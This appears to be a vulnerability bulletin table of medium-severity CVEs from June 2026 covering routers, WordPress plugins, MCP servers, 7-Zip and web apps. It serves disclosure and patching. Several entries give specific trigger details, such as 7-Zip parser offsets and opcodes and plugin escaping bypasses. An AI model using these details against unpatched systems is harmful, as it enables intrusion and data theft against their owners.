| GL.iNet--GL-MT3000 | A security vulnerability has been detected in GL.iNet GL-MT3000 4.4.5. The impacted element is the function rpc_sys of the file /cgi-bin/luci/rpc of the component LuCI JSON-RPC Interface. Such manipulation leads to command injection. The attack may be performed from remote. Upgrading to version 4.8.1 is sufficient to resolve this issue. Upgrading the affected component is advised. The vendor confirms: "The issue discovered by the vulnerability researcher on older firmware versions(4.4.5) has actually been fixed and mitigated in the new version. According to the latest firmware fixes, by default, firmware versions after 4.7.13 do not install LuCI, so this vulnerability cannot be exploited." | 2026-06-07 | 6.3 | CVE-2026-11449 |
| GL.iNet--GL-MT3000 | A weakness has been identified in GL.iNet GL-MT3000 up to 4.4.5. The affected element is the function realpath of the file /rpc of the component Minidlna Service. This manipulation of the argument kube. set causes command injection. The attack is possible to be carried out remotely. Upgrading to version 4.7 is sufficient to fix this issue. It is recommended to upgrade the affected component. The vendor confirms: "Starting from version 4.7, SDK has added global protection to intercept malicious injection". | 2026-06-07 | 4.7 | CVE-2026-11448 |
| GL.iNet--MT3000 | A vulnerability was determined in GL.iNet MT3000 up to 4.4.5. This vulnerability affects unknown code of the file ovpnclient.sh of the component OpenVPN Client Import Workflow. This manipulation causes command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. Upgrading to version 4.9.0_beta3-1012-0513-1778656146 is able to resolve this issue. You should upgrade the affected component. The vendor confirms: "This issue has been addressed by implementing malicious checks on OpenVPN configuration files to prevent command injection attacks carried through malicious configuration files." | 2026-06-06 | 6.3 | CVE-2026-11406 |
| glenwpcoder--Drag and Drop Multiple File Upload for Contact Form 7 | The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'drag_n_drop_text' and 'drag_n_drop_browse_text' Settings in all versions up to, and including, 1.3.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-06 | 4.4 | CVE-2026-8991 |
| go-git--go-billy | Billy is an interface filesystem abstraction for Go. Prior to versions 5.9.0 and 6.0.0-alpha.1, multiple components may improperly handle crafted or malformed input, resulting in panics, infinite loops, uncontrolled recursion, or excessive resource consumption. These issues arise from insufficient validation and missing safety mechanisms such as cycle detection, recursion limits, or defensive handling of unexpected states when processing untrusted repository data and filesystem structures. This issue has been patched in versions 5.9.0 and 6.0.0-alpha.1. | 2026-06-01 | 6.5 | CVE-2026-44740 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, the HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service. Version 26.0.0 fixes the issue. | 2026-06-05 | 6.5 | CVE-2026-46357 |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, an Authenticated Local File Inclusion (LFI) vulnerability in the HAXCMS saveOutline endpoint allows a low-privileged user to read arbitrary files on the server by manipulating the location field written into site.json. This enables attackers to exfiltrate sensitive system files such as /etc/passwd, application secrets, or configuration files accessible to the web server (www-data). Version 26.0.0 patches the issue. | 2026-06-05 | 6.5 | CVE-2026-46397 |
| HCL--iControl | HCL iControl was affected by Weak Input Validation vulnerability. This weakness is caused during implementation of an architectural security tactic. Received input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type. | 2026-06-04 | 4.3 | CVE-2025-52606 |
| HCLSoftware--Digital Experience & DX Compose | HCL Digital Experience and HCL Digital Experience Compose could be susceptible to Host header injection. An attacker can manipulate the Host header and cause the application to behave in unexpected ways. | 2026-06-05 | 6.1 | CVE-2026-21826 |
| HCLSoftware--DX Compose | HCL Digital Experience Compose is affected by a reflected cross-site scripting (XSS) vulnerability in the search center. An attacker could execute arbitrary JavaScript in the victim's browser. | 2026-06-05 | 6.1 | CVE-2026-21825 |
| hekmon8--Jenkins-server-mcp | A vulnerability has been found in hekmon8 Jenkins-server-mcp 0.1.0. This vulnerability affects the function jobPath of the file src/index.ts of the component get_build_status/get_build_log/trigger_build. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10276 |
| HelloTalk--HelloTalk | HelloTalk through 3.4.1 stores full-precision GPS coordinates even when the user had intended to share only a country or city. Furthermore, these coordinates are placed into a database on the client of other users. (The client side was changed in 2019 to encrypt that database.) | 2026-06-05 | 5.3 | CVE-2020-25900 |
| hiraishikentaro--wezterm-mcp | A vulnerability was identified in hiraishikentaro wezterm-mcp 0.1.0. The affected element is an unknown function of the file src/wezterm_executor.ts of the component switch_pane/write_to_specific_pane. The manipulation of the argument request.params.arguments.pane_id leads to os command injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10279 |
| HKUDS--nanobot | Nanobot prior to version 0.2.1 contains a server-side request forgery vulnerability in the web_fetch tool that allows remote attackers to reach internal or private network hosts by supplying a URL that redirects to a loopback or private address via a 3xx Location header. Attackers can exploit the automatic HTTP redirect following behavior in the httpx library to bypass initial URL validation and cause the runtime to send outbound requests to internal hosts before final resolved URL validation is applied. | 2026-06-01 | 5 | CVE-2026-49138 |
| HKUDS--nanobot | Nanobot prior to version 0.2.1 contains a denial of service vulnerability in the Matrix channel media download handler that allows authenticated room members to exhaust process memory and bandwidth by sending media events with missing or invalid size metadata. Attackers can send multiple concurrent Matrix media events with omitted or invalid declared sizes to trigger simultaneous large media downloads that fully materialize response bodies before post-download rejection, consuming process resources until service degradation occurs. | 2026-06-01 | 4.3 | CVE-2026-49140 |
| holithemes--Click to Chat HoliThemes | The Click to Chat - WA Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [chat] shortcode 'num' parameter in all versions up to, and including, 4.38. This is due to insufficient escaping when embedding user-supplied shortcode attribute values inside JavaScript string literals that are then placed in HTML event-handler attributes. The CCW_Shortcode::shortcode() function applies esc_attr() to the 'num' parameter (line 157), which converts single quotes to the HTML entity '. This entity-encoded value is then interpolated directly into a JavaScript window.open() call string delimited by single quotes (line 194/221), and that complete string is placed verbatim into an HTML onclick attribute in the style template files (e.g., sc-style-1.php line 6). Because browsers HTML-decode event attribute values before executing the embedded JavaScript, the ' entities are decoded back to literal single quotes at runtime, allowing the injected payload to break out of the JavaScript string context and execute arbitrary code. This makes it possible for authenticated attackers with Contributor-level access and above to inject arbitrary web scripts into pages that will execute whenever a user clicks the WhatsApp chat button rendered by the [chat] shortcode. | 2026-06-06 | 6.4 | CVE-2026-7795 |
| iAI Lab--PDF AI App | A security flaw has been discovered in iAI Lab PDF AI App 4.21.0 on Android. Impacted is the function getExternalCacheDir of the component chatpdf.pro. Performing a manipulation of the argument _display_name results in path traversal. The attack requires a local approach. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 4.4 | CVE-2026-11411 |
| indrasishbanerjee--aem-mcp-server | A vulnerability was determined in indrasishbanerjee aem-mcp-server up to b5f833aef9b5dfd17a5991b3b18a8a11edbdc583. This impacts the function getAssetMetadata of the file src/mcp-server.ts of the component Axios Request Flow. Executing a manipulation of the argument assetPath can lead to server-side request forgery. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10274 |
| ishayoyo--excel-mcp | A vulnerability was determined in ishayoyo excel-mcp up to 1.0.2. Impacted is an unknown function of the file src/index.ts of the component read_file/write_file. Executing a manipulation of the argument filePath/outputPath can lead to path traversal. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10278 |
| ITPison--OMICARD EDM | OMICARD EDM developed by ITPison has a Insecure Direct Object Reference vulnerability, allowing unauthenticated remote attackers to modify a specific parameter to obtain user's email address. | 2026-06-04 | 5.3 | CVE-2026-10597 |
| itsourcecode--Content Management System | A weakness has been identified in itsourcecode Content Management System 1.0. This impacts an unknown function of the file /instructions.php. This manipulation of the argument topic_id causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 6.3 | CVE-2026-10242 |
| itsourcecode--Content Management System | A vulnerability was identified in itsourcecode Content Management System 1.0. This vulnerability affects unknown code of the file /save_comment.php. The manipulation of the argument Name leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2026-06-01 | 6.3 | CVE-2026-10256 |
| itsourcecode--Content Management System | A security flaw has been discovered in itsourcecode Content Management System 1.0. This issue affects some unknown processing of the file /admin/update_ss_img.php. The manipulation of the argument topic_id results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-01 | 6.3 | CVE-2026-10257 |
| itsourcecode--Content Management System | A weakness has been identified in itsourcecode Content Management System 1.0. Impacted is an unknown function of the file /admin/add_sub_topic.php. This manipulation of the argument topic_id causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 6.3 | CVE-2026-10258 |
| itsourcecode--Content Management System | A vulnerability was identified in itsourcecode Content Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit_topic.php. Such manipulation of the argument topic_id leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2026-06-01 | 6.3 | CVE-2026-10265 |
| itsourcecode--Fees Management System | A vulnerability was determined in itsourcecode Fees Management System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php. Executing a manipulation of the argument Username can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-06-01 | 6.3 | CVE-2026-10296 |
| itsourcecode--Fees Management System | A vulnerability was identified in itsourcecode Fees Management System 1.0. This affects an unknown part of the file /manage_course.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-06-01 | 6.3 | CVE-2026-10297 |
| itsourcecode--Fees Management System | A flaw has been found in itsourcecode Fees Management System 1.0. The impacted element is an unknown function of the file /manage_fee.php. Executing a manipulation of the argument ID can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. | 2026-06-01 | 6.3 | CVE-2026-10302 |
| itsourcecode--Fees Management System | A vulnerability was detected in itsourcecode Fees Management System 1.0. Affected is an unknown function of the file /manage_payment.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-06-02 | 6.3 | CVE-2026-10568 |
| itsourcecode--Fees Management System | A vulnerability was identified in itsourcecode Fees Management System 1.0. This affects an unknown function of the file /manage_student.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2026-06-04 | 6.3 | CVE-2026-10808 |
| itsourcecode--Fees Management System | A security flaw has been discovered in itsourcecode Fees Management System 1.0. This impacts an unknown function of the file /manage_user.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-04 | 6.3 | CVE-2026-10809 |
| itsourcecode--Fees Management System | A security vulnerability has been detected in itsourcecode Fees Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /receipt.php. Such manipulation of the argument ef_id leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2026-06-04 | 6.3 | CVE-2026-10811 |
| itsourcecode--Fees Management System | A vulnerability was detected in itsourcecode Fees Management System 1.0. The affected element is an unknown function of the file index.php. Performing a manipulation of the argument page results in cross site scripting. The attack may be initiated remotely. The exploit is now public and may be used. | 2026-06-01 | 4.3 | CVE-2026-10301 |
| itsourcecode--Fees Management System | A weakness has been identified in itsourcecode Fees Management System up to 1.0. Affected is an unknown function of the file /navbar.php. This manipulation of the argument page causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-04 | 4.3 | CVE-2026-10810 |
| j3k0--mcp-google-workspace | A vulnerability was found in j3k0 mcp-google-workspace up to 831790e7d5c2663325733d9f5579cc339a267c4c. This issue affects the function saveToDisk of the file src/tools/gmail.ts of the component MCP Gmail Tool. Performing a manipulation results in improper access controls. It is possible to initiate the attack remotely. The exploit has been made public and could be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The patch is named 89c091ecf8b9f9c7291d1af0b1966e271f86551c. It is suggested to install a patch to address this issue. | 2026-06-01 | 6.3 | CVE-2026-10277 |
| jamesmuga--Remove NoFollow Commenter URL | The Remove NoFollow Commenter URL plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the gmz_comment_settings_save function. This makes it possible for unauthenticated attackers to modify the plugin's comment-display setting via a forged request via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9730 |
| JeecgBoot--JeecgBoot | A vulnerability was determined in JeecgBoot up to 3.9.2. The affected element is the function WordUtil.addImage of the file /airag/word/edit. Executing a manipulation can lead to server-side request forgery. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. A fix is planned for the upcoming release. | 2026-06-01 | 6.3 | CVE-2026-10239 |
| JeecgBoot--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.2. The impacted element is an unknown function of the file /airag/airagModel/test. The manipulation of the argument baseUrl leads to server-side request forgery. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. A fix is planned for the upcoming release. | 2026-06-01 | 6.3 | CVE-2026-10240 |
| jeecgboot--The server processes these URLs | A security flaw has been discovered in jeecgboot The server processes these URLs up to 3.9.1. This affects the function FileDownloadUtils.download2DiskFromNet of the file /airag/app/debug of the component Cloud Instance Metadata Endpoint. The manipulation results in server-side request forgery. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. Upgrading to version 3.9.2 mitigates this issue. It is suggested to upgrade the affected component. | 2026-06-01 | 6.3 | CVE-2026-10241 |
| jhdscript--ZeM STL | The ZeM STL plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [zemstl] shortcode in all versions up to and including 1.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes, specifically the 'url', 'color', and 'bgcolor' parameters. These attribute values are directly interpolated into HTML attribute context without being passed through esc_attr() or any other escaping function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 6.4 | CVE-2026-4081 |
| Jinher--OA | A weakness has been identified in Jinher OA C6. The affected element is an unknown function of the file /C6/JHSoft.Web.ModuleCount/GetFormSn.aspx. Executing a manipulation of the argument queryID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 6.3 | CVE-2026-11412 |
| jishenghua--jshERP | A security vulnerability has been detected in jishenghua jshERP up to 3.6. This vulnerability affects the function addAccountHeadAndDetail of the file jshERP-boot/src/main/java/com/jsh/erp/service/AccountHeadService.java of the component addAccountHeadAndDetail Endpoint. Such manipulation of the argument fileName leads to path traversal. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-07 | 5.4 | CVE-2026-11467 |
| jishenghua--jshERP | A flaw has been found in jishenghua jshERP up to 3.6. Impacted is the function insertPlatformConfig of the file jshERP-boot/src/main/java/com/jsh/erp/service/PlatformConfigService.java of the component platformConfig Add Endpoint. Executing a manipulation of the argument platformValue can lead to server-side request forgery. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-07 | 4.7 | CVE-2026-11469 |
| johnhuang316--code-index-mcp | A weakness has been identified in johnhuang316 code-index-mcp up to 2.14.0. Affected is the function is_safe_regex_pattern of the component search_code_advanced. Executing a manipulation of the argument regex can lead to inefficient regular expression complexity. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2.14.1 is able to address this issue. This patch is called 25bc02fac74051ddae15ce79e952f00211b1ea6b. Upgrading the affected component is recommended. | 2026-06-02 | 4.3 | CVE-2026-10692 |
| Joomsky--JS Jobs | Joomla com_jsjobs 1.2.6 contains an arbitrary file deletion vulnerability that allows authenticated attackers to delete files by manipulating custom userfield parameters. Attackers can send POST requests to the job.savejob task with path traversal sequences in the field_2 parameter to delete arbitrary files accessible to the web server. | 2026-06-04 | 6.5 | CVE-2019-25740 |
| keystonejs--keystone | A vulnerability was detected in keystonejs keystone up to 20260319. This vulnerability affects unknown code in the library packages/core/src/lib/core/queries/output-field.ts of the component GraphQL API Endpoint. The manipulation results in resource consumption. It is possible to launch the attack remotely. The exploit is now public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 4.3 | CVE-2026-10802 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated attacker to tamper with the internal approval flow configurations of forms belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 6.5 | CVE-2026-23638 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated user to modify resources belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 6.5 | CVE-2026-24753 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated user to modify permissions on resources belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 5.4 | CVE-2026-24755 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated user to modify resources belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 4.3 | CVE-2026-24756 |
| kiteworks--security-advisories | Kiteworks is a private data network (PDN). Prior to version 9.3.0, a stored XSS vulnerability in Kiteworks Secure Data Forms could allow an authenticated attacker to execute arbitrary JavaScript code in other users' sessions. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 5.4 | CVE-2026-24754 |
| klamra22--Klamra Paycal for Aspaclaria | The Klamra Paycal for Aspaclaria plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.4 via the 'invoice_id' parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to download arbitrary customer invoices by enumerating sequential post IDs, exposing sensitive billing PII including full name, email address, phone number, order total, line items, and customer notes belonging to other customers. | 2026-06-06 | 4.3 | CVE-2026-8611 |
| LakshayD02--Hostel-Management-System-PHP | A vulnerability was found in LakshayD02 Hostel-Management-System-PHP up to f87e67c283bab6f718faf2fec6ae39a13bd7036b. This issue affects some unknown processing of the file hostel/index.php of the component Admin Dashboard Page. The manipulation of the argument ID results in missing authorization. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-04 | 6.3 | CVE-2026-10815 |
| latepoint--LatePoint Calendar Booking Plugin for Appointments and Events | The LatePoint - Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.6.0. This is due to missing or incorrect nonce validation on the change_status function. This makes it possible for unauthenticated attackers to change the status of arbitrary invoices - including marking unpaid invoices as paid - without administrator consent via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-05 | 4.3 | CVE-2026-9719 |
| libexpat project--libexpat | libexpat before 2.8.2 lacks handler call depth tracking for calls to XML_GetBuffer, XML_Parse, XML_ParseBuffer, XML_ParserFree, or XML_ParserReset from within handlers in cases of a policy violation. Thus, a use-after-free can occur, | 2026-06-04 | 4.9 | CVE-2026-50219 |
| litonice13--Master Addons For Elementor Widgets, Extensions, Theme Builder, Popup Builder & Template Kits | The Master Addons For Elementor - Widgets, Extensions, Theme Builder, Popup Builder & Template Kits plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'jtlma_custom_js' Page Setting (Custom JS Extension) in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The unfiltered_html capability check is only enforced during Elementor control registration (UI rendering) and not during the save process, enabling Author-level users to inject the jtlma_custom_js setting directly via a crafted POST request to admin-ajax.php?action=elementor_ajax, bypassing the UI-level restriction entirely. | 2026-06-06 | 6.4 | CVE-2026-9281 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains an unauthenticated reflected cross-site scripting vulnerability in the server.log endpoint that allows attackers to inject arbitrary HTML and JavaScript code through the search parameter. Attackers can craft malicious URLs with JavaScript payloads in the search parameter to execute code in users' browsers within the context of the affected application. | 2026-06-05 | 6.1 | CVE-2026-50230 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains a reflected cross-site scripting vulnerability in advanced search parameters that fail to properly sanitize user input before displaying it in search forms. Attackers can inject malicious scripts through unfiltered search parameters to execute arbitrary JavaScript in users' browsers and steal session information. | 2026-06-05 | 6.1 | CVE-2026-50235 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains an arbitrary directory listing vulnerability in its readdirectory query, exposed through both the CLI service (TCP port 9090) and the HTTP JSON-RPC endpoint (/jsonrpc.js). The query accepts a folder parameter and lists its contents with no restriction to the configured media directories and no authentication in the default configuration, allowing a remote, unauthenticated attacker to enumerate arbitrary locations on the host filesystem. | 2026-06-05 | 5.3 | CVE-2026-50233 |
| Mage AI--Mage AI | A vulnerability was detected in Mage AI up to 0.9.79. This impacts the function useMutation of the file mage_ai/frontend/components/Sessions/SignForm/index.tsx of the component Sign-in Flow. Performing a manipulation of the argument query.redirect_url results in cross site scripting. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 4.3 | CVE-2026-11436 |
| Mamunur Rashid--Classified Listing | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Mamunur Rashid Classified Listing allows Path Traversal. This issue affects Classified Listing: from n/a through 5.3.8. | 2026-06-01 | 6.5 | CVE-2026-42679 |
| marcqueralt--DeMomentSomTres Shortcodes | The DeMomentSomTres Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'callout' shortcode in all versions up to, and including, 1.1.1. This is due to insufficient input sanitization and output escaping on the 'width' and 'align' shortcode attributes within the st_callout() function, which concatenates the attribute values directly into an HTML style attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 6.4 | CVE-2026-8885 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.21 through 26.00 contain an An uninitialized memory disclosure vulnerability in the UEFI capsule (.scap) parser in 7-Zip. The OpenCapsule function allocates a heap buffer of attacker-declared CapsuleImageSize (up to 1 GiB) without zero-initialization, then reads the file contents into it with ReadStream_FALSE whose return value is silently discarded. If the file is truncated, the unread tail of the buffer retains uninitialized heap memory, which is then exposed as extracted file content via GetStream. Version 26.0.1 fixes the issue. | 2026-06-05 | 6.5 | CVE-2026-48101 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.18 through 26.00 contain a heap out-of-bounds read in 7-Zip Ar handler BSD SYMDEF parser. A 4-byte heap out-of-bounds read exists in the Unix ar archive parser in 7-Zip. When parsing a BSD-style __.SYMDEF symbol table, the ParseLibSymbols function reads a 32-bit namesSize field via Get32 at a position that can equal the buffer size, reading 4 bytes past the end of the heap allocation. This reads uninitialized heap data under the default allocator. Version 26.01 patches the issue. | 2026-06-05 | 6.5 | CVE-2026-48112 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.34 through 26.00 contain a heap memory disclosure via SquashFS fragment offset integer overflow on 32-bit builds. 32-bit integer overflow in the SquashFS ReadBlock function allows an attacker-controlled node.Offset value to bypass the fragment bounds check, causing memcpy to read heap memory preceding the cache buffer into the extracted file. The vulnerability is exploitable only on 32-bit builds of 7-Zip where size_t is 32 bits, allowing the addition offsetInBlock + blockSize to wrap modulo 2³². On 64-bit builds the addition is promoted to 64 bits and the check correctly rejects the input. Version 26.01 patches the issue. | 2026-06-05 | 4.3 | CVE-2026-48092 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.34 through 26.00 contain an off-by-one heap out-of-bounds read in the WIM (Windows Imaging) archive handler's security descriptor lookup. In CHandler::GetSecurity (CPP/7zip/Archive/Wim/WimHandler.cpp), the per-image SecurOffsets table holds numEntries + 1 cumulative offsets, but the check securityId >= SecurOffsets.Size() admits securityId == numEntries, and the function then reads SecurOffsets[securityId + 1], fetching one UInt32 past the end of the heap-allocated CRecordVector (which performs no bounds checking on operator[]). The securityId is attacker-controlled at offset +0xC of any directory entry in WIM metadata, and the handler is registered for .wim, .swm, .esd, and .ppkg and enabled by default in stock 7z.dll; the OOB triggers zero-click in the GUI because 7zFM.exe's ListView calls GetRawProp(kpidNtSecure) for every item during listing (ASan-confirmed), and is also reachable via CLI listing with 7zz l -slt. Impact is limited to denial of service under hardened allocators and minor information disclosure, since the OOB value is only consumed arithmetically as a length and is not surfaced to the attacker; there is no write primitive. | 2026-06-05 | 4.3 | CVE-2026-48103 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.18 through 26.00 contain an uninitialized heap read in the SquashFS archive handler caused by a sparsely populated index array. In the SquashFS handler, _blockToNode is allocated with capacity for every metadata block but populated only when an inode crosses a block boundary, so a crafted image with few inodes spanning many blocks leaves most slots holding raw heap contents (the underlying allocator does not zero-initialize POD storage). When OpenDir looks up an attacker-influenced blockIndex (derived from the RootInode superblock field), it reads two of these uninitialized slots and passes them as the left/right bounds of a binary search over _nodesPos, which dereferences the midpoint without bounds checking; if the resulting value happens to match the search key, the returned index is used to read a full node struct from _nodes whose fields feed further directory parsing, forming a chained OOB read primitive that is heap-layout-dependent and not reliably triggerable. The SquashFS handler is enabled by default in stock 7z.dll and the issue triggers during Open() with no interaction beyond opening the file; impact is denial of service from wild-pointer dereference and potential heap information disclosure, with no write primitive. Version 26.01 fixes the issue. | 2026-06-05 | 4.2 | CVE-2026-48104 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.21 through 26.00 contain an off-by-one out-of-bounds read vulnerability in the ParseDepedencyExpression function of the UEFI firmware image parser(CPP/7zip/Archive/UefiHandler.cpp). The function validates an attacker-controlled opcode byte using > instead of >= against the element count of the 10-entry kExpressionCommands static array, allowing an opcode value of 10 to read one pointer slot (8 bytes on x64) past the end of the array in .rodata. The out-of-bounds value is then dereferenced as a const char * and passed through strlen and memcpy into the archive's Characts property, which may cause either a denial of service (access violation when the adjacent bytes do not form a valid readable pointer) or a minor information disclosure of an adjacent .rdata string literal into archive metadata. The vulnerability is reached automatically during IInArchive::Open() via the call path OpenFv/OpenCapsule → ParseVolume → ParseSections when processing a SECTION_DXE_DEPEX (0x13) or SECTION_PEI_DEPEX (0x1B) section whose first body byte is 0x0A, and the UEFI handler is enabled by default in stock 7z.dll with signature-based detection for both UEFIc and UEFIf formats. The outcome (crash vs. silent leak) is deterministic per build but linker-layout dependent, with no write primitive and no disclosure of heap data, secrets, or ASLR base addresses. Version 26.01 fixes the issue. | 2026-06-05 | 4.3 | CVE-2026-48111 |
| Metasoft --MetaCRM | A security vulnerability has been detected in Metasoft 美特软件 MetaCRM 6.4.0. The impacted element is an unknown function of the file develop/systparam/softlogo/upload.jsp. Such manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10205 |
| Microsoft--Copilot Chat (Microsoft Edge) | Improper neutralization of special elements in output used by a downstream component ('injection') in Copilot Chat (Microsoft Edge) allows an unauthorized attacker to disclose information over a network. | 2026-06-04 | 6.5 | CVE-2026-47644 |
| Microsoft--Microsoft 365 Copilot | Improper neutralization of special elements used in a command ('command injection') in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-06-04 | 6.5 | CVE-2026-42824 |
| Microsoft--Microsoft Graph | Exposure of sensitive information to an unauthorized actor in Microsoft Graph allows an authorized attacker to disclose information over a network. | 2026-06-04 | 6.5 | CVE-2026-47655 |
| milvus-io--milvus | A vulnerability has been found in milvus-io milvus up to 2.6.13. This vulnerability affects unknown code of the file internal/metastore/kv/rootcoord/kv_catalog.go of the component Grantee ID Hash Handler. The manipulation leads to use of weak hash. The attack needs to be performed locally. The attack's complexity is rated as high. It is stated that the exploitability is difficult. The exploit has been disclosed to the public and may be used. The identifier of the patch is 3d932f1c3e065351c4440c27abe1e6479752544d. Applying a patch is the recommended action to fix this issue. | 2026-06-04 | 4.5 | CVE-2026-10814 |
| Mimecast--Incydr | In Mimecast Incydr before 2.6.0, arbitrary file access can occur. | 2026-06-05 | 4.5 | CVE-2026-50590 |
